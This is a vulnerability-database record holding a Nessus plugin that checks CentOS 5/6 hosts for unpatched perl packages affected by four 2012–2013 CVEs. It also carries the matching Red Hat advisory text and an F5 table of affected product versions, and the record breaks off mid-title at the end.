{"id": "CENTOS_RHSA-2013-0685.NASL", "bulletinFamily": "scanner", "title": "CentOS 5 / 6 : perl (CESA-2013:0685)", "description": "Updated perl packages that fix multiple security issues now available\nfor Red Hat Enterprise Linux 5 and 6.\n\nThe Red Hat Security Response Team has rated this update as having\nmoderate security impact. Common Vulnerability Scoring System (CVSS)\nbase scores, which give detailed severity ratings, are available for\neach vulnerability from the CVE links in the References section.\n\nPerl is a high-level programming language commonly used for system\nadministration utilities and web programming.\n\nA heap overflow flaw was found in Perl. If a Perl application allowed\nuser input to control the count argument of the string repeat\noperator, an attacker could cause the application to crash or,\npotentially, execute arbitrary code with the privileges of the user\nrunning the application. (CVE-2012-5195)\n\nA denial of service flaw was found in the way Perl's rehashing code\nimplementation, responsible for recalculation of hash keys and\nredistribution of hash content, handled certain input. If an attacker\nsupplied specially crafted input to be used as hash keys by a Perl\napplication, it could cause excessive memory consumption.\n(CVE-2013-1667)\n\nIt was found that the Perl CGI module, used to handle Common Gateway\nInterface requests and responses, incorrectly sanitized the values for\nSet-Cookie and P3P headers. If a Perl application using the CGI module\nreused cookies values and accepted untrusted input from web browsers,\na remote attacker could use this flaw to alter member items of the\ncookie or add new items. (CVE-2012-5526)\n\nIt was found that the Perl Locale::Maketext module, used to localize\nPerl applications, did not properly handle backslashes or\nfully-qualified method names. An attacker could possibly use this flaw\nto execute arbitrary Perl code with the privileges of a Perl\napplication that uses untrusted Locale::Maketext templates.\n(CVE-2012-6329)\n\nRed Hat would like to thank the Perl project for reporting\nCVE-2012-5195 and CVE-2013-1667. Upstream acknowledges Tim Brown as\nthe original reporter of CVE-2012-5195 and Yves Orton as the original\nreporter of CVE-2013-1667.\n\nAll Perl users should upgrade to these updated packages, which contain\nbackported patches to correct these issues. All running Perl programs\nmust be restarted for this update to take effect.", "published": "2013-03-27T00:00:00", "modified": "2013-03-27T00:00:00", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "href": "https://www.tenable.com/plugins/nessus/65694", "reporter": "This script is Copyright (C) 2013-2021 and is owned by Tenable, Inc. or an Affiliate thereof.", "references": ["http://www.nessus.org/u?fae8bbce", "http://www.nessus.org/u?0fe51482"], "cvelist": ["CVE-2012-5195", "CVE-2013-1667", "CVE-2012-5526", "CVE-2012-6329"], "type": "nessus", "lastseen": "2021-01-06T09:28:36", "edition": 25, "viewCount": 13, "enchantments": {"dependencies": {"references": [{"type": "f5", "idList": ["SOL15867", "F5:K15867"]}, {"type": "cve", "idList": ["CVE-2012-5195", "CVE-2012-5526", "CVE-2012-6329", "CVE-2013-1667"]}, {"type": "centos", "idList": ["CESA-2013:0685"]}, {"type": "redhat", "idList": ["RHSA-2013:0746", "RHSA-2013:0685"]}, {"type": "amazon", "idList": ["ALAS-2013-177"]}, {"type": "oraclelinux", "idList": ["ELSA-2013-0685"]}, {"type": "nessus", "idList": ["SOLARIS11_PERL-512_20131017.NASL", "ORACLEVM_OVMSA-2016-0076.NASL", "REDHAT-RHSA-2013-0685.NASL", "ALA_ALAS-2013-177.NASL", "SUSE_11_PERL-130301.NASL", "MANDRIVA_MDVSA-2013-113.NASL", "SL_20130326_PERL_ON_SL5_X.NASL", "F5_BIGIP_SOL15867.NASL", "ORACLELINUX_ELSA-2013-0685.NASL", "OPENSUSE-2013-225.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:850454", "OPENVAS:1361412562310881700", "OPENVAS:870972", "OPENVAS:881698", "OPENVAS:1361412562310850454", "OPENVAS:881700", "OPENVAS:1361412562310123654", "OPENVAS:1361412562310881698", "OPENVAS:1361412562310870972", "OPENVAS:1361412562310120561"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2013:0502-1", "OPENSUSE-SU-2013:0497-1", "SUSE-SU-2013:0442-1", "SUSE-SU-2013:0441-1"]}, {"type": "fedora", "idList": ["FEDORA:D263821ACF", "FEDORA:942C320E6D", "FEDORA:2394F21ABD", "FEDORA:8ABCA212D1"]}, {"type": "aix", "idList": ["PERL_ADVISORY3.ASC", "PERL_ADVISORY4.ASC"]}, {"type": "debian", "idList": ["DEBIAN:DSA-2586-1:65FFB"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:30295", "SECURITYVULNS:VULN:12731", "SECURITYVULNS:DOC:28787", "SECURITYVULNS:DOC:28873", "SECURITYVULNS:VULN:13559"]}, {"type": "ubuntu", "idList": ["USN-1643-1", "USN-2099-1"]}, {"type": "gentoo", "idList": ["GLSA-201401-11", "GLSA-201410-02"]}, {"type": "exploitdb", "idList": ["EDB-ID:23579"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/UNIX/WEBAPP/TWIKI_MAKETEXT"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:118856", "PACKETSTORM:119054"]}, {"type": "dsquare", "idList": ["E-304"]}, {"type": "seebug", "idList": ["SSV:60534"]}], "modified": "2021-01-06T09:28:36", "rev": 2}, "score": {"value": 8.0, "vector": "NONE", "modified": "2021-01-06T09:28:36", "rev": 2}, "vulnersScore": 8.0}, "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2013:0685 and \n# CentOS Errata and Security Advisory 2013:0685 respectively.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(65694);\n script_version(\"1.28\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2012-5195\", \"CVE-2012-5526\", \"CVE-2012-6329\", \"CVE-2013-1667\");\n script_bugtraq_id(56287, 56562, 56950, 58311);\n script_xref(name:\"RHSA\", value:\"2013:0685\");\n\n script_name(english:\"CentOS 5 / 6 : perl (CESA-2013:0685)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote CentOS host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated perl packages that fix multiple security issues now available\nfor Red Hat Enterprise Linux 5 and 6.\n\nThe Red Hat Security Response Team has rated this update as having\nmoderate security impact. Common Vulnerability Scoring System (CVSS)\nbase scores, which give detailed severity ratings, are available for\neach vulnerability from the CVE links in the References section.\n\nPerl is a high-level programming language commonly used for system\nadministration utilities and web programming.\n\nA heap overflow flaw was found in Perl. If a Perl application allowed\nuser input to control the count argument of the string repeat\noperator, an attacker could cause the application to crash or,\npotentially, execute arbitrary code with the privileges of the user\nrunning the application. (CVE-2012-5195)\n\nA denial of service flaw was found in the way Perl's rehashing code\nimplementation, responsible for recalculation of hash keys and\nredistribution of hash content, handled certain input. If an attacker\nsupplied specially crafted input to be used as hash keys by a Perl\napplication, it could cause excessive memory consumption.\n(CVE-2013-1667)\n\nIt was found that the Perl CGI module, used to handle Common Gateway\nInterface requests and responses, incorrectly sanitized the values for\nSet-Cookie and P3P headers. If a Perl application using the CGI module\nreused cookies values and accepted untrusted input from web browsers,\na remote attacker could use this flaw to alter member items of the\ncookie or add new items. (CVE-2012-5526)\n\nIt was found that the Perl Locale::Maketext module, used to localize\nPerl applications, did not properly handle backslashes or\nfully-qualified method names. An attacker could possibly use this flaw\nto execute arbitrary Perl code with the privileges of a Perl\napplication that uses untrusted Locale::Maketext templates.\n(CVE-2012-6329)\n\nRed Hat would like to thank the Perl project for reporting\nCVE-2012-5195 and CVE-2013-1667. Upstream acknowledges Tim Brown as\nthe original reporter of CVE-2012-5195 and Yves Orton as the original\nreporter of CVE-2013-1667.\n\nAll Perl users should upgrade to these updated packages, which contain\nbackported patches to correct these issues. All running Perl programs\nmust be restarted for this update to take effect.\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2013-March/019668.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?fae8bbce\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2013-March/019669.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?0fe51482\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected perl packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2012-5195\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"Foswiki 1.1.5 RCE\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'TWiki MAKETEXT Remote Command Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:perl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:perl-Archive-Extract\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:perl-Archive-Tar\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:perl-CGI\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:perl-CPAN\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:perl-CPANPLUS\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:perl-Compress-Raw-Bzip2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:perl-Compress-Raw-Zlib\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:perl-Compress-Zlib\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:perl-Digest-SHA\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:perl-ExtUtils-CBuilder\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:perl-ExtUtils-Embed\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:perl-ExtUtils-MakeMaker\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:perl-ExtUtils-ParseXS\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:perl-File-Fetch\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:perl-IO-Compress-Base\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:perl-IO-Compress-Bzip2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:perl-IO-Compress-Zlib\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:perl-IO-Zlib\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:perl-IPC-Cmd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:perl-Locale-Maketext-Simple\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:perl-Log-Message\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:perl-Log-Message-Simple\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:perl-Module-Build\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:perl-Module-CoreList\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:perl-Module-Load\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:perl-Module-Load-Conditional\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:perl-Module-Loaded\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:perl-Module-Pluggable\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:perl-Object-Accessor\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:perl-Package-Constants\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:perl-Params-Check\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:perl-Parse-CPAN-Meta\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:perl-Pod-Escapes\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:perl-Pod-Simple\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:perl-Term-UI\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:perl-Test-Harness\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:perl-Test-Simple\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:perl-Time-HiRes\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:perl-Time-Piece\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:perl-core\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:perl-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:perl-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:perl-parent\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:perl-suidperl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:perl-version\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:centos:centos:5\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:centos:centos:6\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2012/11/21\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/03/26\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/03/27\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"CentOS Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/CentOS/release\", \"Host/CentOS/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/CentOS/release\");\nif (isnull(release) || \"CentOS\" >!< release) audit(AUDIT_OS_NOT, \"CentOS\");\nos_ver = pregmatch(pattern: \"CentOS(?: Linux)? release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"CentOS\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(5|6)([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"CentOS 5.x / 6.x\", \"CentOS \" + os_ver);\n\nif (!get_kb_item(\"Host/CentOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"CentOS\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"CentOS-5\", reference:\"perl-5.8.8-40.el5_9\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"perl-suidperl-5.8.8-40.el5_9\")) flag++;\n\nif (rpm_check(release:\"CentOS-6\", reference:\"perl-5.10.1-130.el6_4\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"perl-Archive-Extract-0.38-130.el6_4\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"perl-Archive-Tar-1.58-130.el6_4\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"perl-CGI-3.51-130.el6_4\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"perl-CPAN-1.9402-130.el6_4\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"perl-CPANPLUS-0.88-130.el6_4\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"perl-Compress-Raw-Bzip2-2.020-130.el6_4\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"perl-Compress-Raw-Zlib-2.020-130.el6_4\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"perl-Compress-Zlib-2.020-130.el6_4\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"perl-Digest-SHA-5.47-130.el6_4\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"perl-ExtUtils-CBuilder-0.27-130.el6_4\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"perl-ExtUtils-Embed-1.28-130.el6_4\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"perl-ExtUtils-MakeMaker-6.55-130.el6_4\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"perl-ExtUtils-ParseXS-2.2003.0-130.el6_4\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"perl-File-Fetch-0.26-130.el6_4\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"perl-IO-Compress-Base-2.020-130.el6_4\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"perl-IO-Compress-Bzip2-2.020-130.el6_4\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"perl-IO-Compress-Zlib-2.020-130.el6_4\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"perl-IO-Zlib-1.09-130.el6_4\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"perl-IPC-Cmd-0.56-130.el6_4\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"perl-Locale-Maketext-Simple-0.18-130.el6_4\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"perl-Log-Message-0.02-130.el6_4\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"perl-Log-Message-Simple-0.04-130.el6_4\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"perl-Module-Build-0.3500-130.el6_4\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"perl-Module-CoreList-2.18-130.el6_4\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"perl-Module-Load-0.16-130.el6_4\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"perl-Module-Load-Conditional-0.30-130.el6_4\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"perl-Module-Loaded-0.02-130.el6_4\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"perl-Module-Pluggable-3.90-130.el6_4\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"perl-Object-Accessor-0.34-130.el6_4\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"perl-Package-Constants-0.02-130.el6_4\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"perl-Params-Check-0.26-130.el6_4\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"perl-Parse-CPAN-Meta-1.40-130.el6_4\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"perl-Pod-Escapes-1.04-130.el6_4\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"perl-Pod-Simple-3.13-130.el6_4\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"perl-Term-UI-0.20-130.el6_4\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"perl-Test-Harness-3.17-130.el6_4\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"perl-Test-Simple-0.92-130.el6_4\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"perl-Time-HiRes-1.9721-130.el6_4\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"perl-Time-Piece-1.15-130.el6_4\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"perl-core-5.10.1-130.el6_4\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"perl-devel-5.10.1-130.el6_4\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"perl-libs-5.10.1-130.el6_4\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"perl-parent-0.221-130.el6_4\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"perl-suidperl-5.10.1-130.el6_4\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"perl-version-0.77-130.el6_4\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"perl / perl-Archive-Extract / perl-Archive-Tar / perl-CGI / etc\");\n}\n", "naslFamily": "CentOS Local Security Checks", "pluginID": "65694", "cpe": ["p-cpe:/a:centos:centos:perl-Pod-Simple", "p-cpe:/a:centos:centos:perl", "p-cpe:/a:centos:centos:perl-IPC-Cmd", "p-cpe:/a:centos:centos:perl-Parse-CPAN-Meta", "p-cpe:/a:centos:centos:perl-IO-Compress-Zlib", "p-cpe:/a:centos:centos:perl-Module-Load", "cpe:/o:centos:centos:6", "p-cpe:/a:centos:centos:perl-IO-Zlib", "p-cpe:/a:centos:centos:perl-Digest-SHA", "p-cpe:/a:centos:centos:perl-Time-HiRes", "p-cpe:/a:centos:centos:perl-CGI", "p-cpe:/a:centos:centos:perl-Params-Check", "p-cpe:/a:centos:centos:perl-Compress-Raw-Zlib", "p-cpe:/a:centos:centos:perl-Object-Accessor", "p-cpe:/a:centos:centos:perl-IO-Compress-Base", "p-cpe:/a:centos:centos:perl-Module-Build", "p-cpe:/a:centos:centos:perl-Locale-Maketext-Simple", "p-cpe:/a:centos:centos:perl-ExtUtils-CBuilder", "p-cpe:/a:centos:centos:perl-File-Fetch", "p-cpe:/a:centos:centos:perl-Log-Message-Simple", "p-cpe:/a:centos:centos:perl-IO-Compress-Bzip2", "p-cpe:/a:centos:centos:perl-Term-UI", "p-cpe:/a:centos:centos:perl-ExtUtils-ParseXS", "p-cpe:/a:centos:centos:perl-Archive-Extract", "p-cpe:/a:centos:centos:perl-CPAN", "p-cpe:/a:centos:centos:perl-Time-Piece", "p-cpe:/a:centos:centos:perl-ExtUtils-Embed", "p-cpe:/a:centos:centos:perl-Pod-Escapes", "p-cpe:/a:centos:centos:perl-devel", "cpe:/o:centos:centos:5", "p-cpe:/a:centos:centos:perl-CPANPLUS", "p-cpe:/a:centos:centos:perl-Log-Message", "p-cpe:/a:centos:centos:perl-Module-Loaded", "p-cpe:/a:centos:centos:perl-version", "p-cpe:/a:centos:centos:perl-parent", "p-cpe:/a:centos:centos:perl-Compress-Raw-Bzip2", "p-cpe:/a:centos:centos:perl-Module-Pluggable", "p-cpe:/a:centos:centos:perl-libs", "p-cpe:/a:centos:centos:perl-core", "p-cpe:/a:centos:centos:perl-Compress-Zlib", "p-cpe:/a:centos:centos:perl-Module-CoreList", "p-cpe:/a:centos:centos:perl-Test-Simple", "p-cpe:/a:centos:centos:perl-ExtUtils-MakeMaker", "p-cpe:/a:centos:centos:perl-Module-Load-Conditional", "p-cpe:/a:centos:centos:perl-suidperl", "p-cpe:/a:centos:centos:perl-Package-Constants", "p-cpe:/a:centos:centos:perl-Test-Harness", "p-cpe:/a:centos:centos:perl-Archive-Tar"], "scheme": null}

{"f5": [{"lastseen": "2019-04-30T18:21:05", "bulletinFamily": "software", "cvelist": ["CVE-2012-5195", "CVE-2013-1667", "CVE-2012-5526", "CVE-2012-6329"], "description": "\nF5 Product Development has assigned ID 416734 (BIG-IP), ID 474513 (BIG-IQ), and ID 474518 (Enterprise Manager) to this vulnerability, and has evaluated the currently supported releases for potential vulnerability.\n\nTo determine if your release is known to be vulnerable, the components or features that are affected by the vulnerability, and for information about releases or hotfixes that address the vulnerability, refer to the following table:\n\nProduct| Versions known to be vulnerable| Versions known to be not vulnerable| Vulnerable component or feature \n---|---|---|--- \nBIG-IP LTM| 11.0.0 - 11.6.1 \n10.0.0 - 10.2.4| 12.0.0 - 12.1.2 \n11.6.1 HF1 \n11.5.4 HF4| Perl binary and library \nBIG-IP AAM| 11.4.0 - 11.6.1| 12.0.0 - 12.1.2 \n11.6.1 HF1 \n11.5.4 HF4| Perl binary and library \nBIG-IP AFM| 11.3.0 - 11.6.1| 12.0.0 - 12.1.2 \n11.6.1 HF1 \n11.5.4 HF4| Perl binary and library \nBIG-IP Analytics| 11.0.0 - 11.6.1| 12.0.0 - 12.1.2 \n11.6.1 HF1 \n11.5.4 HF4| Perl binary and library \nBIG-IP APM| 11.0.0 - 11.6.1 \n10.1.0 - 10.2.4| 12.0.0 - 12.1.2 \n11.6.1 HF1 \n11.5.4 HF4| Perl binary and library \nBIG-IP ASM| 11.0.0 - 11.6.1 \n10.0.0 - 10.2.4| 12.0.0 - 12.1.2 \n11.6.1 HF1 \n11.5.4 HF4| Perl binary and library \nBIG-IP Edge Gateway| 11.0.0 - 11.3.0 \n10.1.0 - 10.2.4| None| Perl binary and library \nBIG-IP GTM| 11.0.0 - 11.6.1 \n10.0.0 - 10.2.4| 11.6.1 HF1 \n11.5.4 HF4| Perl binary and library \nBIG-IP Link Controller| 11.0.0 - 11.6.1 \n10.0.0 - 10.2.4| 12.0.0 - 12.1.2 \n11.6.1 HF1 \n11.5.4 HF4| Perl binary and library \nBIG-IP PEM| 11.3.0 - 11.6.1| 12.0.0 - 12.1.2 \n11.6.1 HF1 \n11.5.4 HF4| Perl binary and library \nBIG-IP PSM| 11.0.0 - 11.4.1 \n10.0.0 - 10.2.4| None| Perl binary and library \nBIG-IP DNS| None| 12.0.0 - 12.1.2| None \nBIG-IP WebAccelerator| 11.0.0 - 11.3.0 \n10.0.0 - 10.2.4| None| Perl binary and library \nBIG-IP WOM| 11.0.0 - 11.3.0 \n10.0.0 - 10.2.4| None| Perl binary and library \nARX| None| 6.0.0 - 6.4.0| None \nEnterprise Manager| 3.0.0 - 3.1.1 \n2.1.0 - 2.3.0| None| Perl binary and library \nFirePass| None| 7.0.0 \n6.0.0 - 6.1.0| None \nBIG-IQ Cloud| 4.0.0 - 4.5.0| None| Perl binary and library \nBIG-IQ Device| 4.2.0 - 4.5.0| None| Perl binary and library \nBIG-IQ Security| 4.0.0 - 4.5.0| None| Perl binary and library \nBIG-IQ ADC| 4.5.0| None| Perl binary and library \nBIG-IQ Centralized Management| 5.0.0 - 5.1.0 \n4.6.0| None| Perl binary and library \nBIG-IQ Cloud and Orchestration| 1.0.0| None| Perl binary and library \nF5 iWorkflow| 2.0.0 - 2.0.2| 2.1.0| Perl binary and library\n\nIf you are running a version listed in the **Versions known to be vulnerable **column, you can eliminate this vulnerability by upgrading to a version listed in the **Versions known to be not vulnerable **column. If the table lists only an older version than what you are currently running, or does not list a non-vulnerable version, then no upgrade candidate currently exists.\n\nTo determine the necessary upgrade path for your BIG-IQ system, you should understand the BIG-IQ product offering name changes. For more information, refer to [K21232150: Considerations for upgrading BIG-IQ or F5 iWorkflow systems](<https://support.f5.com/csp/article/K21232150>).\n\nMitigation\n\nTo mitigate this vulnerability, you should permit access to the system over a secure network and limit command line access to trusted users. For more information about securing access to the system, refer to [K13092: Overview of securing access to the BIG-IP system](<https://support.f5.com/csp/article/K13092>).\n\n * [K9970: Subscribing to email notifications regarding F5 products](<https://support.f5.com/csp/article/K9970>)\n * [K9957: Creating a custom RSS feed to view new and updated documents](<https://support.f5.com/csp/article/K9957>)\n * [K4602: Overview of the F5 security vulnerability response policy](<https://support.f5.com/csp/article/K4602>)\n * [K4918: Overview of the F5 critical issue hotfix policy](<https://support.f5.com/csp/article/K4918>)\n", "edition": 1, "modified": "2017-04-26T22:14:00", "published": "2014-11-25T21:29:00", "id": "F5:K15867", "href": "https://support.f5.com/csp/article/K15867", "title": "Perl vulnerabilities CVE-2012-5195, CVE-2012-5526, CVE-2012-6329, and CVE-2013-1667", "type": "f5", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2016-09-26T17:23:18", "bulletinFamily": "software", "cvelist": ["CVE-2012-5195", "CVE-2013-1667", "CVE-2012-5526", "CVE-2012-6329"], "edition": 1, "description": "Vulnerability Recommended Actions\n\nIf you are running a version listed in the **Versions known to be vulnerable **column, you can eliminate this vulnerability by upgrading to a version listed in the **Versions known to be not vulnerable **column. If the table lists only an older version than what you are currently running, or does not list a non-vulnerable version, then no upgrade candidate currently exists.\n\nTo mitigate this vulnerability, you should permit access to the system over a secure network and limit command line access to trusted users. For more information about securing access to the system, refer to SOL13092: Overview of securing access to the BIG-IP system.\n\nSupplemental Information\n\n * SOL9970: Subscribing to email notifications regarding F5 products\n * SOL9957: Creating a custom RSS feed to view new and updated documents\n * SOL4602: Overview of the F5 security vulnerability response policy\n * SOL4918: Overview of the F5 critical issue hotfix policy\n", "modified": "2016-09-01T00:00:00", "published": "2014-11-25T00:00:00", "href": "http://support.f5.com/kb/en-us/solutions/public/15000/800/sol15867.html", "id": "SOL15867", "title": "SOL15867 - Perl 